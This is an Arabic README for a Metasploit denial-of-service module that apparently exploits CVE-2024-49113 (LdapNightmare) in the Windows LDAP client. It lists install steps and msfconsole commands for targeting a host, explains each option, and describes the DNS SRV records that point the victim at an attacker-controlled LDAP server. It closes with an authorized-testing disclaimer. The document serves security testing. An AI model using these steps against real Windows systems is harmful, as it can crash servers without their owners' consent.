
إثبات المفهوم CVE-2024-49113 (LdapNightmare) من SafeBreaches مدمج في Metasploit
إثبات المفهوم لـ CVE-2024-49113 (LdapNightmare) من SafeBreach مدمج في Metasploit
تطبق هذه الوحدة الثغرة CVE-2024-49113، وهي ثغرة حرجة في عميل LDAP الخاص بنظام ويندوز يمكن أن تسبب عدم استقرار النظام. تتكامل الوحدة مع إطار عمل Metasploit، وتوفر طريقة موثوقة لاختبار مرونة النظام ضد هذه الثغرة.
ldaptor
impacket
ثبّت حزم بايثون المطلوبة:
pip install -r requirements.txt
ضع الوحدة في دليل وحدات Metasploit الخاص بك:
cp ldapnightmare.py /path/to/metasploit/modules/auxiliary/dos/windows/ldap/
تأكد من أن الوحدة قابلة للتنفيذ:
chmod +x ldapnightmare.py
ابدأ msfconsole:
msfconsole
قم بتحميل وتكوين الوحدة:
use auxiliary/dos/windows/ldap/ldapnightmare
set RHOSTS target_ip
set RPORT 49664
set LPORT 389
set DOMAINNAME yourdomain.com
run
RHOSTS - عنوان الهدف (مطلوب)RPORT - منفذ الهدف لـ RPC (الافتراضي: 49664)LPORT - المنفذ المحلي لخادم LDAP (الافتراضي: 389)DOMAINNAME - اسم نطاق المهاجم (مطلوب). يجب أن يحتوي هذا النطاق على سجلات SRV محددة لـ DNS (انظر تكوين النطاق أدناه)ACCOUNT - اسم الحساب الهدف (الافتراضي: Administrator)SITENAME - اسم الموقع الهدف (الافتراضي: فارغ)تتطلب معلمة DOMAINNAME تكوين سجلات SRV محددة لـ DNS. يجب أن يحتوي النطاق على سجلين SRV تحته:
ldap.tcp.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameldap.tcp.default-first-site-name._sites.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameملاحظة هامة: سيعمل اسم مضيف جهاز المهاجم فقط إذا كان الخادم الضحية قادرًا على حله باستخدام NBNS. بدلاً من ذلك، يمكنك استبدال اسم المضيف باسم نطاق يشير إلى عنوان IP الخاص بخادم LDAP الخاص بك.
تعمل الوحدة في ثلاث مراحل رئيسية:
هذه الوحدة مخصصة لأغراض اختبار الأمان والبحث المصرح به فقط. يجب على المستخدمين الحصول على التفويض المناسب قبل اختبار أي أنظمة لا يمتلكونها أو لديهم إذن باختبارها.
يتم إصدار هذه الوحدة بموجب ترخيص BSD 3-Clause.
يحتوي هذا العمل على كود مشتق من:
يمكن العثور على نصوص الترخيص الكاملة في ملف LICENSES.